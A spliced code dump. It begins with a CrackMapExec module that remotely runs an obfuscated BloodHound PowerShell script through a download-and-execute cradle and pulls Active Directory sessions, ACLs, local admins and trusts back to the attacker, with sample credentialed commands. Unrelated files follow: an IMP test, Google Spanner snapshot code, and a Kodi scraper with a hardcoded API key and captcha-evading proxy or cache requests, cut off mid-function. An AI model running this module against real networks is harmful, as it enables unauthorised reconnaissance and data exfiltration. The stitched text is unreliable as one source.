name = 'bloodhound'
    description = 'Executes the BloodHound recon script on the target and retrieves the results to the attackers\' machine'
supported_protocols = ['smb']
opsec_safe= False
multiple_hosts = False
def options(self, context, module_options):
'''
        THREADS             Max number of threads to execute on target (defaults to 3)
COLLECTIONMETHOD Method used by BloodHound ingestor to collect data (defaults to 'Default')
CSVPATH (optional) Path where csv files will be written on target (defaults to C:\)
NEO4JURI (optional) URI for direct Neo4j ingestion (defaults to blank)
NEO4JUSER (optional) Username for direct Neo4j ingestion
NEO4JPASS (optional) Pass for direct Neo4j ingestion
Give NEO4J options to perform direct Neo4j ingestion (no CSVs on target)
'''
self.threads = 3
self.csv_path = 'C:\\'
self.collection_method = 'Default'
self.neo4j_URI = ""
self.neo4j_user = ""
self.neo4j_pass = ""
if module_options and 'THREADS' in module_options:
self.threads = module_options['THREADS']
if module_options and 'CSVPATH' in module_options:
self.csv_path = module_options['CSVPATH']
if module_options and 'COLLECTIONMETHOD' in module_options:
self.collection_method = module_options['COLLECTIONMETHOD']
if module_options and 'NEO4JURI' in module_options:
self.neo4j_URI = module_options['NEO4JURI']
if module_options and 'NEO4JUSER' in module_options:
self.neo4j_user = module_options['NEO4JUSER']
if module_options and 'NEO4JPASS' in module_options:
self.neo4j_pass = module_options['NEO4JPASS']
if self.neo4j_URI != "" and self.neo4j_user != "" and self.neo4j_pass != "" :
self.opsec_safe= True
self.ps_script = obfs_ps_script('BloodHound-modified.ps1')
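    # Hedged usage note (editorial addition, not part of the original module):
    # these options are passed on the CrackMapExec command line with -o, e.g.
    #   cme smb 192.168.1.10 -u admin -p 'Passw0rd!' -M bloodhound -o THREADS=5 COLLECTIONMETHOD=Session
    # or, assuming a reachable Neo4j REST endpoint, for direct (opsec-safe) ingestion:
    #   cme smb 192.168.1.10 -u admin -p 'Passw0rd!' -M bloodhound -o NEO4JURI=http://127.0.0.1:7474/db/data/ NEO4JUSER=neo4j NEO4JPASS=neo4j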
def on_admin_login(self, context, connection):
if self.neo4j_URI == "" and self.neo4j_user == "" and self.neo4j_pass == "" :
command = "Invoke-BloodHound -CSVFolder '{}' -Throttle '{}' -CollectionMethod '{}'".format(self.csv_path, self.threads, self.collection_method)
else :
command = 'Invoke-BloodHound -URI {} -UserPass "{}:{}" -Throttle {} -CollectionMethod {}'.format(self.neo4j_URI, self.neo4j_user, self.neo4j_pass, self.threads, self.collection_method)
launcher = gen_ps_iex_cradle(context, 'BloodHound-modified.ps1', command)
connection.ps_execute(launcher)
context.log.success('Executed launcher')
def on_request(self, context, request):
if 'BloodHound-modified.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
request.wfile.write(self.ps_script.encode())
context.log.success('Executing payload... this can take a few minutes...')
else:
request.send_response(404)
request.end_headers()
def on_response(self, context, response):
response.send_response(200)
response.end_headers()
length = int(response.headers.get('content-length'))
data = response.rfile.read(length).decode()
response.stop_tracking_host()
if self.neo4j_URI == "" and self.neo4j_user == "" and self.neo4j_pass == "" :
self.parse_ouput(data, context, response)
context.log.success("Successfully retreived data")
def parse_ouput(self, data, context, response):
'''
Parse the output from Invoke-BloodHound
'''
parsedData = data.split("!-!")
        nameList = ['user_sessions', 'group_membership', 'acls', 'local_admins', 'trusts']  # '.csv' is appended when building log_name below
for x in range(0, len(parsedData)):
if "ComputerName" in parsedData[x] and "UserName" in parsedData[x] :
log_name = '{}-{}-{}.csv'.format(nameList[0], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
context.log.info("Saved csv output to {}".format(log_name))
elif "GroupName" in parsedData[x] and "AccountName" in parsedData[x] :
log_name = '{}-{}-{}.csv'.format(nameList[1], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
context.log.info("Saved csv output to {}".format(log_name))
elif "ComputerName" in parsedData[x] and "AccountName" in parsedData[x] :
log_name = '{}-{}-{}.csv'.format(nameList[3], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
context.log.info("Saved csv output to {}".format(log_name))
elif "SourceDomain" in parsedData[x] and "TrustType" in parsedData[x] :
log_name = '{}-{}-{}.csv'.format(nameList[4], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
context.log.info("Saved csv output to {}".format(log_name))
elif "ObjectName" in parsedData[x] and "ObjectType" in parsedData[x] :
log_name = '{}-{}-{}.csv'.format(nameList[2], response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(parsedData[x].replace('" "', '"\n"').replace(' "', '"'), log_name)
context.log.info("Saved csv output to {}".format(log_name)) | bsd-2-clause | -7,558,939,601,482,193,000 | 54.482759 | 196 | 0.605905 | false |
shanot/imp | modules/em/test/test_pad_margin.py | 2 | 1482 | from __future__ import print_function
import os
import IMP
import IMP.em
import IMP.test
import IMP.core
class Tests(IMP.test.TestCase):
"""Class to test EM correlation restraint"""
def load_density_maps(self):
mrw = IMP.em.MRCReaderWriter()
self.scene = IMP.em.read_map(
self.get_input_file_name("1z5s_20.imp.mrc"),
mrw)
self.scene.get_header_writable().set_resolution(20.)
self.scene.update_voxel_size(2.5)
self.scene.calcRMS()
def setUp(self):
"""Build test model and optimizer"""
IMP.test.TestCase.setUp(self)
self.imp_model = IMP.Model()
self.load_density_maps()
def test_pad_margin(self):
"""Test the pad_margin function"""
scene_padded = self.scene.pad_margin(3, 3, 3)
self.scene.calcRMS()
scene_padded.calcRMS()
# test that the centers are the same
padded_h = scene_padded.get_header()
h = self.scene.get_header()
apix = h.get_spacing()
scene_center = self.scene.get_centroid(0.1)
padded_scene_center = scene_padded.get_centroid(0.1)
print(scene_center, padded_scene_center)
print(IMP.algebra.get_distance(padded_scene_center, scene_center))
self.assertAlmostEqual(
IMP.algebra.get_distance(
padded_scene_center,
scene_center),
0,
1)
if __name__ == '__main__':
IMP.test.main()
| gpl-3.0 | -3,142,320,444,239,026,700 | 28.058824 | 74 | 0.593117 | false |
tseaver/gcloud-python | spanner/google/cloud/spanner_v1/snapshot.py | 1 | 17350 | # Copyright 2016 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Model a set of read-only queries to a database as a snapshot."""
import functools
from google.protobuf.struct_pb2 import Struct
from google.cloud.spanner_v1.proto.transaction_pb2 import TransactionOptions
from google.cloud.spanner_v1.proto.transaction_pb2 import TransactionSelector
from google.api_core.exceptions import ServiceUnavailable
from google.cloud._helpers import _datetime_to_pb_timestamp
from google.cloud._helpers import _timedelta_to_duration_pb
from google.cloud.spanner_v1._helpers import _make_value_pb
from google.cloud.spanner_v1._helpers import _metadata_with_prefix
from google.cloud.spanner_v1._helpers import _SessionWrapper
from google.cloud.spanner_v1.streamed import StreamedResultSet
from google.cloud.spanner_v1.types import PartitionOptions
def _restart_on_unavailable(restart):
"""Restart iteration after :exc:`.ServiceUnavailable`.
:type restart: callable
:param restart: curried function returning iterator
"""
resume_token = b''
item_buffer = []
iterator = restart()
while True:
try:
for item in iterator:
item_buffer.append(item)
if item.resume_token:
resume_token = item.resume_token
break
except ServiceUnavailable:
del item_buffer[:]
iterator = restart(resume_token=resume_token)
continue
if len(item_buffer) == 0:
break
for item in item_buffer:
yield item
del item_buffer[:]
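# Illustrative sketch (editorial addition, not used by the code below): the
# ``restart`` callable handed to ``_restart_on_unavailable`` must accept an
# optional ``resume_token`` keyword and return a fresh result iterator, which
# is exactly how ``read`` / ``execute_sql`` curry the API calls below.
def _example_restart_usage(api, session_name, sql, transaction, metadata):
    restart = functools.partial(
        api.execute_streaming_sql, session_name, sql,
        transaction=transaction, metadata=metadata)
    return _restart_on_unavailable(restart)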
class _SnapshotBase(_SessionWrapper):
"""Base class for Snapshot.
Allows reuse of API request methods with different transaction selector.
:type session: :class:`~google.cloud.spanner_v1.session.Session`
:param session: the session used to perform the commit
"""
_multi_use = False
_transaction_id = None
_read_request_count = 0
def _make_txn_selector(self): # pylint: disable=redundant-returns-doc
"""Helper for :meth:`read` / :meth:`execute_sql`.
Subclasses must override, returning an instance of
:class:`transaction_pb2.TransactionSelector`
appropriate for making ``read`` / ``execute_sql`` requests
:raises: NotImplementedError, always
"""
raise NotImplementedError
def read(self, table, columns, keyset, index='', limit=0, partition=None):
"""Perform a ``StreamingRead`` API request for rows in a table.
:type table: str
:param table: name of the table from which to fetch data
:type columns: list of str
:param columns: names of columns to be retrieved
:type keyset: :class:`~google.cloud.spanner_v1.keyset.KeySet`
:param keyset: keys / ranges identifying rows to be retrieved
:type index: str
:param index: (Optional) name of index to use, rather than the
table's primary key
:type limit: int
:param limit: (Optional) maximum number of rows to return.
Incompatible with ``partition``.
:type partition: bytes
:param partition: (Optional) one of the partition tokens returned
from :meth:`partition_read`. Incompatible with
``limit``.
:rtype: :class:`~google.cloud.spanner_v1.streamed.StreamedResultSet`
:returns: a result set instance which can be used to consume rows.
:raises ValueError:
for reuse of single-use snapshots, or if a transaction ID is
already pending for multiple-use snapshots.
"""
if self._read_request_count > 0:
if not self._multi_use:
raise ValueError("Cannot re-use single-use snapshot.")
if self._transaction_id is None:
raise ValueError("Transaction ID pending.")
database = self._session._database
api = database.spanner_api
metadata = _metadata_with_prefix(database.name)
transaction = self._make_txn_selector()
restart = functools.partial(
api.streaming_read,
self._session.name, table, columns, keyset._to_pb(),
transaction=transaction, index=index, limit=limit,
partition_token=partition, metadata=metadata)
iterator = _restart_on_unavailable(restart)
self._read_request_count += 1
if self._multi_use:
return StreamedResultSet(iterator, source=self)
else:
return StreamedResultSet(iterator)
def execute_sql(self, sql, params=None, param_types=None,
query_mode=None, partition=None):
"""Perform an ``ExecuteStreamingSql`` API request.
:type sql: str
:param sql: SQL query statement
:type params: dict, {str -> column value}
:param params: values for parameter replacement. Keys must match
the names used in ``sql``.
:type param_types: dict[str -> Union[dict, .types.Type]]
:param param_types:
(Optional) maps explicit types for one or more param values;
required if parameters are passed.
:type query_mode:
:class:`google.cloud.spanner_v1.proto.ExecuteSqlRequest.QueryMode`
:param query_mode: Mode governing return of results / query plan. See
            https://cloud.google.com/spanner/reference/rpc/google.spanner.v1#google.spanner.v1.ExecuteSqlRequest.QueryMode
:type partition: bytes
:param partition: (Optional) one of the partition tokens returned
from :meth:`partition_query`.
:rtype: :class:`~google.cloud.spanner_v1.streamed.StreamedResultSet`
:returns: a result set instance which can be used to consume rows.
:raises ValueError:
for reuse of single-use snapshots, or if a transaction ID is
already pending for multiple-use snapshots.
"""
if self._read_request_count > 0:
if not self._multi_use:
raise ValueError("Cannot re-use single-use snapshot.")
if self._transaction_id is None:
raise ValueError("Transaction ID pending.")
if params is not None:
if param_types is None:
raise ValueError(
"Specify 'param_types' when passing 'params'.")
params_pb = Struct(fields={
key: _make_value_pb(value) for key, value in params.items()})
else:
params_pb = None
database = self._session._database
metadata = _metadata_with_prefix(database.name)
transaction = self._make_txn_selector()
api = database.spanner_api
restart = functools.partial(
api.execute_streaming_sql,
self._session.name, sql,
transaction=transaction, params=params_pb, param_types=param_types,
query_mode=query_mode, partition_token=partition,
metadata=metadata)
iterator = _restart_on_unavailable(restart)
self._read_request_count += 1
if self._multi_use:
return StreamedResultSet(iterator, source=self)
else:
return StreamedResultSet(iterator)
def partition_read(self, table, columns, keyset, index='',
partition_size_bytes=None, max_partitions=None):
"""Perform a ``ParitionRead`` API request for rows in a table.
:type table: str
:param table: name of the table from which to fetch data
:type columns: list of str
:param columns: names of columns to be retrieved
:type keyset: :class:`~google.cloud.spanner_v1.keyset.KeySet`
:param keyset: keys / ranges identifying rows to be retrieved
:type index: str
:param index: (Optional) name of index to use, rather than the
table's primary key
:type partition_size_bytes: int
:param partition_size_bytes:
(Optional) desired size for each partition generated. The service
uses this as a hint, the actual partition size may differ.
:type max_partitions: int
:param max_partitions:
(Optional) desired maximum number of partitions generated. The
service uses this as a hint, the actual number of partitions may
differ.
:rtype: iterable of bytes
:returns: a sequence of partition tokens
:raises ValueError:
for single-use snapshots, or if a transaction ID is
            already associated with the snapshot.
"""
if not self._multi_use:
raise ValueError("Cannot use single-use snapshot.")
if self._transaction_id is None:
raise ValueError("Transaction not started.")
database = self._session._database
api = database.spanner_api
metadata = _metadata_with_prefix(database.name)
transaction = self._make_txn_selector()
partition_options = PartitionOptions(
partition_size_bytes=partition_size_bytes,
max_partitions=max_partitions,
)
response = api.partition_read(
session=self._session.name,
table=table,
columns=columns,
key_set=keyset._to_pb(),
transaction=transaction,
index=index,
partition_options=partition_options,
metadata=metadata,
)
return [partition.partition_token for partition in response.partitions]
def partition_query(self, sql, params=None, param_types=None,
partition_size_bytes=None, max_partitions=None):
"""Perform a ``ParitionQuery`` API request.
:type sql: str
:param sql: SQL query statement
:type params: dict, {str -> column value}
:param params: values for parameter replacement. Keys must match
the names used in ``sql``.
:type param_types: dict[str -> Union[dict, .types.Type]]
:param param_types:
(Optional) maps explicit types for one or more param values;
required if parameters are passed.
:type partition_size_bytes: int
:param partition_size_bytes:
(Optional) desired size for each partition generated. The service
uses this as a hint, the actual partition size may differ.
:type max_partitions: int
:param max_partitions:
(Optional) desired maximum number of partitions generated. The
service uses this as a hint, the actual number of partitions may
differ.
:rtype: iterable of bytes
:returns: a sequence of partition tokens
:raises ValueError:
for single-use snapshots, or if a transaction ID is
            already associated with the snapshot.
"""
if not self._multi_use:
raise ValueError("Cannot use single-use snapshot.")
if self._transaction_id is None:
raise ValueError("Transaction not started.")
if params is not None:
if param_types is None:
raise ValueError(
"Specify 'param_types' when passing 'params'.")
params_pb = Struct(fields={
key: _make_value_pb(value) for key, value in params.items()})
else:
params_pb = None
database = self._session._database
api = database.spanner_api
metadata = _metadata_with_prefix(database.name)
transaction = self._make_txn_selector()
partition_options = PartitionOptions(
partition_size_bytes=partition_size_bytes,
max_partitions=max_partitions,
)
response = api.partition_query(
session=self._session.name,
sql=sql,
transaction=transaction,
params=params_pb,
param_types=param_types,
partition_options=partition_options,
metadata=metadata,
)
return [partition.partition_token for partition in response.partitions]
class Snapshot(_SnapshotBase):
"""Allow a set of reads / SQL statements with shared staleness.
See
https://cloud.google.com/spanner/reference/rpc/google.spanner.v1#google.spanner.v1.TransactionOptions.ReadOnly
If no options are passed, reads will use the ``strong`` model, reading
at a timestamp where all previously committed transactions are visible.
:type session: :class:`~google.cloud.spanner_v1.session.Session`
:param session: the session used to perform the commit.
:type read_timestamp: :class:`datetime.datetime`
:param read_timestamp: Execute all reads at the given timestamp.
:type min_read_timestamp: :class:`datetime.datetime`
:param min_read_timestamp: Execute all reads at a
timestamp >= ``min_read_timestamp``.
:type max_staleness: :class:`datetime.timedelta`
:param max_staleness: Read data at a
timestamp >= NOW - ``max_staleness`` seconds.
:type exact_staleness: :class:`datetime.timedelta`
:param exact_staleness: Execute all reads at a timestamp that is
``exact_staleness`` old.
:type multi_use: :class:`bool`
    :param multi_use: If true, multiple :meth:`read` / :meth:`execute_sql`
calls can be performed with the snapshot in the
context of a read-only transaction, used to ensure
isolation / consistency. Incompatible with
``max_staleness`` and ``min_read_timestamp``.
"""
def __init__(self, session, read_timestamp=None, min_read_timestamp=None,
max_staleness=None, exact_staleness=None, multi_use=False):
super(Snapshot, self).__init__(session)
opts = [
read_timestamp, min_read_timestamp, max_staleness, exact_staleness]
flagged = [opt for opt in opts if opt is not None]
if len(flagged) > 1:
raise ValueError("Supply zero or one options.")
if multi_use:
if min_read_timestamp is not None or max_staleness is not None:
raise ValueError(
"'multi_use' is incompatible with "
"'min_read_timestamp' / 'max_staleness'")
self._strong = len(flagged) == 0
self._read_timestamp = read_timestamp
self._min_read_timestamp = min_read_timestamp
self._max_staleness = max_staleness
self._exact_staleness = exact_staleness
self._multi_use = multi_use
def _make_txn_selector(self):
"""Helper for :meth:`read`."""
if self._transaction_id is not None:
return TransactionSelector(id=self._transaction_id)
if self._read_timestamp:
key = 'read_timestamp'
value = _datetime_to_pb_timestamp(self._read_timestamp)
elif self._min_read_timestamp:
key = 'min_read_timestamp'
value = _datetime_to_pb_timestamp(self._min_read_timestamp)
elif self._max_staleness:
key = 'max_staleness'
value = _timedelta_to_duration_pb(self._max_staleness)
elif self._exact_staleness:
key = 'exact_staleness'
value = _timedelta_to_duration_pb(self._exact_staleness)
else:
key = 'strong'
value = True
options = TransactionOptions(
read_only=TransactionOptions.ReadOnly(**{key: value}))
if self._multi_use:
return TransactionSelector(begin=options)
else:
return TransactionSelector(single_use=options)
def begin(self):
"""Begin a read-only transaction on the database.
:rtype: bytes
:returns: the ID for the newly-begun transaction.
:raises ValueError:
if the transaction is already begun, committed, or rolled back.
"""
if not self._multi_use:
raise ValueError("Cannot call 'begin' on single-use snapshots")
if self._transaction_id is not None:
raise ValueError("Read-only transaction already begun")
if self._read_request_count > 0:
raise ValueError("Read-only transaction already pending")
database = self._session._database
api = database.spanner_api
metadata = _metadata_with_prefix(database.name)
txn_selector = self._make_txn_selector()
response = api.begin_transaction(
self._session.name, txn_selector.begin, metadata=metadata)
self._transaction_id = response.id
return self._transaction_id
| apache-2.0 | 5,522,960,487,971,635,000 | 36.964989 | 123 | 0.620288 | false |
vadyur/script.media.aggregator | movieapi.py | 1 | 34003 | # -*- coding: utf-8 -*-
import log
from log import debug, print_tb
import json, re, base, filesystem
import urllib2, requests
from bs4 import BeautifulSoup
user_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.100'
def copy_files(src, dst, pattern):
from backgrounds import safe_copyfile
for ext in ['.strm', '.nfo', '.strm.alternative']:
src_file = filesystem.join(src, base.make_fullpath(pattern, ext))
if filesystem.exists(src_file):
dst_file = filesystem.join(dst, base.make_fullpath(pattern, ext))
safe_copyfile(src_file, dst_file)
def make_imdb_path(path, imdb):
if imdb and imdb.startswith('tt'):
return filesystem.join(path, 'TTx' + imdb[3:5], imdb)
return path
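# For illustration: make_imdb_path('/movies', 'tt0133093') returns the result of
# filesystem.join('/movies', 'TTx13', 'tt0133093'); ids without a 'tt' prefix
# (or an empty id) leave the path unchanged.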
def write_movie(fulltitle, link, settings, parser, path, skip_nfo_exists=False, download_torrent=True):
debug('+-------------------------------------------')
filename = parser.make_filename()
if filename:
debug('fulltitle: ' + fulltitle.encode('utf-8'))
debug('filename: ' + filename.encode('utf-8'))
debug('-------------------------------------------+')
imdb = parser.get_value('imdb_id')
new_path = make_imdb_path(path, imdb)
if new_path != path:
copy_files(path, new_path, filename)
		with filesystem.save_make_chdir_context(new_path, 'movieapi.write_movie'):
from strmwriter import STRMWriter
STRMWriter(parser.link()).write(filename, new_path,
parser=parser,
settings=settings)
from nfowriter import NFOWriter
NFOWriter(parser, movie_api = parser.movie_api()).write_movie(filename, new_path, skip_nfo_exists=skip_nfo_exists)
if download_torrent:
from downloader import TorrentDownloader
TorrentDownloader(parser.link(), settings.torrents_path(), settings).download()
settings.update_paths.add(new_path)
return filesystem.relpath( filesystem.join(new_path, base.make_fullpath(filename, '.strm')), start=settings.base_path())
def get_tmdb_api_key():
key = 'f090bb54758cabf231fb605d3e3e0468'
host = 'api.tmdb.org'
import filesystem
try:
import xbmc
home_path = xbmc.translatePath('special://home').decode('utf-8')
major = xbmc.getInfoLabel("System.BuildVersion").split(".")[0]
if int(major) > 17:
return {'host': host, 'key': key }
except ImportError:
# cur = filesystem.dirname(__file__)
# home_path = filesystem.join(cur, '../..')
return {'host': host, 'key': key }
try:
xml_path = filesystem.join(home_path, 'addons', 'metadata.common.themoviedb.org', 'tmdb.xml')
with filesystem.fopen(xml_path, 'r') as xml:
content = xml.read()
match = re.search(r'api_key=(\w+)', content)
if match:
key = match.group(1)
debug('get_tmdb_api_key: ok')
m = re.search(r'://(.+)/3/', content)
if m:
host = m.group(1)
except BaseException as e:
debug('get_tmdb_api_key: ' + str(e))
return {'host': host, 'key': key }
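# The returned mapping is consumed the way TMDB_API builds its request URLs
# below, e.g. 'http://%s/3/movie/popular?api_key=%s&language=ru' % (d['host'], d['key'])
# where d = get_tmdb_api_key().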
def attr_text(s):
return s.get_text()
def attr_split_slash(s):
itms = s.get_text().split('/')
return [i.strip() for i in itms]
def attr_year(s):
import re
m = re.search(r'(\d\d\d\d)', s.get_text())
if m:
return m.group(1)
def attr_genre(s):
return [ a.get_text() for a in s.find_all('a') ]
class IDs(object):
kp_by_imdb = {}
imdb_by_kp = {}
@staticmethod
def id_by_kp_url(url):
import re
m = re.search(r"(\d\d+)", url)
if m:
return m.group(1)
return None
@staticmethod
def get_by_kp(kp_url):
return IDs.imdb_by_kp.get(IDs.id_by_kp_url(kp_url))
@staticmethod
def get_by_imdb(imdb_id):
return IDs.kp_by_imdb.get(imdb_id)
@staticmethod
def set(imdb_id, kp_url):
if imdb_id and kp_url:
kp_id = IDs.id_by_kp_url(kp_url)
IDs.imdb_by_kp[kp_id] = imdb_id
IDs.kp_by_imdb[imdb_id] = kp_id
@staticmethod
def has_imdb(imdb_id):
return imdb_id in IDs.kp_by_imdb
@staticmethod
def has_kp(kp_url):
kp_id = IDs.id_by_kp_url(kp_url)
return kp_id in IDs.imdb_by_kp
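# Small illustrative helper (editorial addition, never called by the addon):
# IDs keeps a bidirectional in-memory map between Kinopoisk and IMDB ids.
def _example_ids_usage():
	IDs.set('tt0133093', 'http://www.kinopoisk.ru/film/301/')
	assert IDs.get_by_imdb('tt0133093') == '301'
	assert IDs.get_by_kp('http://www.kinopoisk.ru/film/301/') == 'tt0133093'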
from soup_base import soup_base
class world_art_soup(soup_base):
headers = {
'Host': 'www.world-art.ru',
'Upgrade-Insecure-Requests': '1',
'User-Agent': user_agent,
'X-Compress': 'null',
}
def __init__(self, url):
soup_base.__init__(self, url, self.headers)
class world_art_actors(world_art_soup):
def __init__(self, url):
world_art_soup.__init__(self, url)
self._actors = []
@property
def actors(self):
if not self._actors:
def append_actor(tr):
tds = tr.find_all('td', recursive=False)
a = tds[1].find('a')
act = {}
if a:
id = a['href'].split('?id=')[-1]
id = id.split('&')[0]
#if td.find('img', attrs={'src': "../img/photo.gif"}):
# act['photo'] = 'http://www.world-art.ru/img/people/10000/{}.jpg'.format(int(id))
act['ru_name'] = tds[1].get_text()
act['en_name'] = tds[2].get_text()
act['role'] = tds[3].get_text()
				#act = { k:v for k, v in act.iteritems() if v }  # dict comprehension: not compatible with Python 2.6
res = {}
for k, v in act.iteritems():
if v:
res[k] = v
self._actors.append(res)
for b in self.soup.find_all('b'):
if b.get_text() == u'Актёры':
table = b.find_parent('table')
table = table.find_next_siblings('table')[1]
for tr_next in table.find_all('tr'):
append_actor(tr_next)
'''
tr = b.find_parent('tr')
if tr:
for tr_next in tr.find_next_siblings('tr'):
append_actor(tr_next)
'''
return self._actors
def __getitem__(self, i):
if isinstance(i, int):
return self.actors[i]
elif isinstance(i, str) or isinstance(i, unicode):
for act in self.actors:
if act['ru_name'] == i:
return act
if act['en_name'] == i:
return act
raise KeyError
class world_art_info(world_art_soup):
Request_URL = "http://www.world-art.ru/%s"
attrs = [
(u'Названия', 'knowns', attr_split_slash),
(u'Производство', 'country', attr_text),
(u'Хронометраж', 'runtime', attr_text),
(u'Жанр', 'genre', attr_genre),
(u'Первый показ', 'year', attr_year),
(u'Режиссёр', 'director', attr_text),
]
def __init__(self, url):
world_art_soup.__init__(self, self.Request_URL % url)
self._info_data = dict()
self._actors = None
@property
def actors(self):
if not self._actors:
self._actors = world_art_actors(self.url.replace('cinema.php', 'cinema_full_cast.php'))
return self._actors.actors
@property
def data(self):
def next_td(td, fn):
return fn(td.next_sibling.next_sibling)
if not self._info_data:
data = {}
for td in self.soup.find_all('td', class_='review'):
td_text = td.get_text()
find = [item for item in self.attrs if td_text in item]
if find:
item = find[0]
data[item[1]] = next_td(td, item[2])
self._info_data = data.copy()
return self._info_data
def __getattr__(self, name):
names = [i[1] for i in self.attrs]
if name in names:
return self.data[name]
raise AttributeError
@property
def imdb(self):
a = self.soup.select('a[href*=imdb.com]')
if a:
for part in a[0]['href'].split('/'):
if part.startswith('tt'):
return part
@property
def kp_url(self):
a = self.soup.select('a[href*=kinopoisk.ru]')
return a[0]['href']
@property
def plot(self):
p = self.soup.find('p', attrs ={'class':'review', 'align': 'justify'})
if p:
return p.get_text()
class world_art(world_art_soup):
Request_URL = "http://www.world-art.ru/search.php?public_search=%s&global_sector=cinema"
def __init__(self, title, year=None, imdbid=None, kp_url=None):
import urllib
url = self.Request_URL % urllib.quote_plus(title.encode('cp1251'))
world_art_soup.__init__(self, url)
self._title = title
self._year = year
self._imdbid = imdbid
self._kp_url = kp_url
self._info = None
@property
def info(self):
if not self._info:
results = self.search_by_title(self._title)
#filter by year
if self._year:
results = [ item for item in results if item.year == self._year ]
if self._imdbid:
results = [ item for item in results if item.imdb == self._imdbid ]
if results:
self._info = results[0]
return self._info
if self._kp_url:
results = [ item for item in results if IDs.id_by_kp_url(item.kp_url) == IDs.id_by_kp_url(self._kp_url) ]
if results:
self._info = results[0]
return self._info
# filter by title
for item in results:
if self._title in item.knowns:
self._info = item
return self._info
self._info = 'No info'
#for info in results:
# imdb = info.imdb
if self._info == 'No info':
raise AttributeError
return self._info
def search_by_title(self, title):
result = []
for meta in self.soup.find_all('meta'):
# meta <meta content="0; url=/cinema/cinema.php?id=68477" http-equiv="Refresh"/> Tag
if meta.get('http-equiv') == "Refresh" and 'url=/cinema/cinema.php?id=' in meta.get('content'):
url = meta.get('content').split('url=/')[-1]
info = world_art_info(url)
info.year = self._year
#info.knowns = [ self._title ]
result.append( info )
for a in self.soup.find_all('a', class_="estimation"):
info = world_art_info(a['href'])
tr = a
while tr.name != 'tr':
tr = tr.parent
info.year = tr.find('td').get_text()
td = a.parent
info.knowns = [ i.get_text() for i in td.find_all('i') ]
result.append( info )
return result
def plot(self):
return self.info.plot
#def trailer(self):
# info = self.info
def director(self):
try:
result = self.info.director
result = result.replace(u'и другие', '')
return [d.strip() for d in result.split(',')]
except:
return []
def actors(self):
try:
return self.info.actors
except:
return []
class tmdb_movie_item(object):
def __init__(self, json_data, type='movie'):
self.json_data_ = json_data
self.type = type
def poster(self):
try:
return 'http://image.tmdb.org/t/p/w500' + self.json_data_['poster_path']
except BaseException:
return ''
def fanart(self):
try:
return 'http://image.tmdb.org/t/p/original' + self.json_data_['backdrop_path']
except BaseException:
return ''
def get_art(self):
art = {}
path = self.poster()
art['thumb'] = path
art['poster'] = path
art['thumbnailImage'] = path
art['fanart'] = self.fanart()
return art
def get_info(self):
info = {}
if 'genres' in self.json_data_:
info['genre'] = u', '.join([i['name'] for i in self.json_data_['genres']])
analogy = {
'aired': 'release_date',
'plot': 'overview',
'title': 'name',
'originaltitle': 'originalname',
}
for tag in analogy:
if analogy[tag] in self.json_data_:
info[tag] = self.json_data_[analogy[tag]]
if 'aired' in info:
aired = info['aired']
m = re.search('(\d\d\d\d)', aired)
if m:
info['year'] = int(m.group(1))
try:
vid_item = self.json_data_['videos']['results'][0]
if vid_item['site'] == 'YouTube':
info['trailer'] = 'plugin://plugin.video.youtube/?action=play_video&videoid=' + vid_item['key']
except BaseException:
pass
string_items = ['director', 'mpaa', 'title', 'originaltitle', 'duration', 'studio', 'code', 'album', 'votes', 'thumb']
for item in string_items:
if item in self.json_data_:
info[item] = self.json_data_[item]
# 'credits',
return info
def imdb(self):
try:
if 'imdb_id' in self.json_data_:
return self.json_data_['imdb_id']
elif 'external_ids' in self.json_data_ and 'imdb_id' in self.json_data_['external_ids']:
return self.json_data_['external_ids']['imdb_id']
except BaseException:
return None
def tmdb_id(self):
if 'id' in self.json_data_:
return self.json_data_['id']
else:
return None
class Object(object):
pass
class KinopoiskAPI(object):
# Common session for KP requests
session = None
kp_requests = []
@staticmethod
def make_url_by_id(kp_id):
return 'http://www.kinopoisk.ru/film/' + str(kp_id) + '/'
def __init__(self, kinopoisk_url = None, settings = None):
from settings import Settings
self.settings = settings if settings else Settings('')
self.kinopoisk_url = kinopoisk_url
self.soup = None
self._actors = None
def _http_get(self, url):
for resp in KinopoiskAPI.kp_requests:
if resp['url'] == url:
return resp['response']
r = requests.Response()
if self.session is None:
self.session = requests.session()
try:
if self.settings.kp_googlecache:
r = self.get_google_cache(url)
else:
proxy = 'socks5h://socks.zaborona.help:1488'
proxies = { 'http': proxy, 'https': proxy } if self.settings.kp_usezaborona else None
headers = {'user-agent': user_agent}
r = self.session.get(url, headers=headers, proxies=proxies, timeout=5.0)
except requests.exceptions.ConnectionError as ce:
r = requests.Response()
r.status_code = requests.codes.service_unavailable
debug(str(ce))
except requests.exceptions.Timeout as te:
r = requests.Response()
r.status_code = requests.codes.request_timeout
debug(str(te))
if not self.settings.kp_googlecache:
if 'captcha' in r.text:
r = self.get_google_cache(url)
KinopoiskAPI.kp_requests.append({'url': url, 'response': r})
return r
def get_google_cache(self, url):
import urllib
search_url = "http://www.google.com/search?q=" + urllib.quote_plus(url)
headers = {'user-agent': user_agent}
r = self.session.get(search_url, headers=headers, timeout=2.0)
try:
soup = BeautifulSoup(base.clean_html(r.text), 'html.parser')
a = soup.find('a', class_='fl')
if a:
cache_url = a['href']
import urlparse
res = urlparse.urlparse(cache_url)
res = urlparse.ParseResult(res.scheme if res.scheme else 'https',
res.netloc if res.netloc else 'webcache.googleusercontent.com',
